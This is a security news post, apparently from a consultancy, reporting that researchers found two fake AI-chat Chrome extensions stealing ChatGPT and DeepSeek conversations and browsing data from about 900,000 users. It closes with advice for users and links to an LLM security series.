Malicious Chrome Extensions Steal ChatGPT and DeepSeek Conversations from 900K Users
Security researchers have uncovered a malicious browser extension campaign on the Google Chrome Web Store that has compromised more than 900,000 users by secretly exfiltrating ChatGPT and DeepSeek conversations, along with full browsing histories, to attacker-controlled servers.
How the compromise works
Researchers from OX Security found two extensions designed to mimic legitimate AI chat tools:
Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI — over 600,000 installs and previously carrying a Google “Featured” badge
AI Sidebar with Deepseek, ChatGPT, Claude and more — over 300,000 installs
Once installed, these extensions request permissions that allow them to monitor browser tabs and DOM elements on sites hosting AI chat sessions. They then collect:
chat prompts and responses from ChatGPT and DeepSeek
full URLs and browsing activity
session metadata
Collected data is encoded and sent to command-and-control servers approximately every 30 minutes. This exposes corporate IP, business strategies, personal identifiable information, and sensitive internal URLs.
Why this matters
The stolen data can be leveraged for:
corporate espionage
targeted phishing attacks
identity theft
sale on underground markets
The fact that one of the extensions bore a Google “Featured” badge highlights risks even for seemingly vetted software.
User guidance
Security professionals recommend:
removing the identified malicious extensions immediately
auditing all installed extensions and their permissions
avoiding AI chat extensions from unknown publishers
using official web interfaces for AI services
DIAMATIX Perspective
DIAMATIX notes that incidents like this underline the growing risk of sensitive data exposure when AI tools and browser extensions are used without sufficient security controls.
As part of our LLM Security 101 series, we examine key threats related to enterprise AI usage, including malicious extensions, prompt injection attacks, and uncontrolled data leakage, alongside practical guidance for safer AI adoption.
LLM SECURITY 101 — PART 1: Understanding the Basics & Key Early Risks
LLM SECURITY 101 — PART 2: Advanced Risks and Practical Safeguards for Everyday AI Use
Trusted · Innovative · Vigilant
Sources:
The Hacker News, Cybersecurity News, Cybernews




